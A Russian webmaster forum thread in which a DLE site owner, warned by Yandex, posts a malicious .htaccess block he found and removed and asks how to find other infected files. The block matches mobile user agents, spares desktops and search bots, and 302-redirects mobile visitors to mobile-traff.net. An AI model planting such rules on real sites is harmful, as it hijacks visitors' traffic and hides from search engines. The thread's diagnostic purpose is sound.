Народ нужна Ваша помощь!
Страницы: 1
Народ нужна Ваша помощь!
Всем привет! При сегодняшнем апдейте Яндекса обнаружил вот такую прелесть у себя на сайте:
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Как оказалось вся причина в пере направлении мобильного трафика, в связи с чем полез лопатить свой сайт в поисках вредоносного кода. В результате нашел вот такую какашку в .htaccess 



Код
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]


Код
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} java [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} play [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} port [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} send [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]

Код
RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC]

Код

Код
RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !bsd [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !x11 [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !unix [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !macos [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !playstation [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !google [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !yandex [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !bot [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !libwww [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !msn [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !america [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !avant [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !download [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !fdm [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !maui [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]

Код
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

Код
RewriteCond %{QUERY_STRING} !wpc_nr [NC]

Код


Код
RewriteRule ^(.*)$ http://mobile-traff.net/ [L,R=302]


Конечно я эту шнягу удалил, но теперь вопрос остались ли после этого какие либо вредоносные файлы в движке (DLE 9.5) и как мне их найти?

Заранее спасибо откликнувшимся на мою беду! 
Проверь папку engine на посторонние файлы (по дате создания например)...могли своровать не только вап, но и веб траф, попробуй скачать со своего сайта какие нибудь файлы, если качается прямой ссылкой с твоего сайта, то норм.
Цитата
_Cepera_ пишет:
Проверь папку engine на посторонние файлы (по дате создания например)...могли своровать не только вап, но и веб траф, попробуй скачать со своего сайта какие нибудь файлы, если качается прямой ссылкой с твоего сайта, то норм.
Спасибо, сейчас проверю...
Еще вопрос, Яндекс мне порекомендовал проверить все скрипты сайта на наличие вредоносного кода, но а что именно искать не описал. Может кто подкинет пару примеров этой хрени в скриптах, чтобы я хоть на что-то ориентировался.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
22:56 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
17:58 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
16:58 Profit Pixels - In-House Форекс, Крипто, Трейдинг CPA Офферы | Еженедельные Выплаты | CPA до $950 
16:11 Яндекс.Фильтры 
15:21 Adtrafico - Правильная партнёрская сеть под бурж трафик 
11:44 2Index - быстрая индексация страниц сайта и обратных ссылок 
15:17 Жирная ссылка бесплатно. АПдейт Яндекс выдача 30 мая 2024 
01:00 Рассылка в TELEGRAM |Большой опыт работы | Любые тематики | Лучшая конверсия 
01:00 Рассылка сообщений в ЛС DISCORD 
00:59 Прием платежей для HIGH RISK | Прием платежей без сайта 
23:21 SiteAnalyzer SEO Tools - бесплатное браузерное расширение для Chrome & Firefox 
20:35 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
19:25 Услуга чертежника и 3D моделирования 
11:35 Google Voice - OLD аккаунты "SMS и звонки" 
05:15 Калифорния легализует компостирование людей к 2027 году 
05:13 Популярный сократитель заблокирован? 
02:54 Точные прогнозы на футбол 
01:23 В России летом могут представить возможный аналог YouTube 
01:05 Касперский ОС 
01:05 Жизнь за границей, куда переехать. 
20:54 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди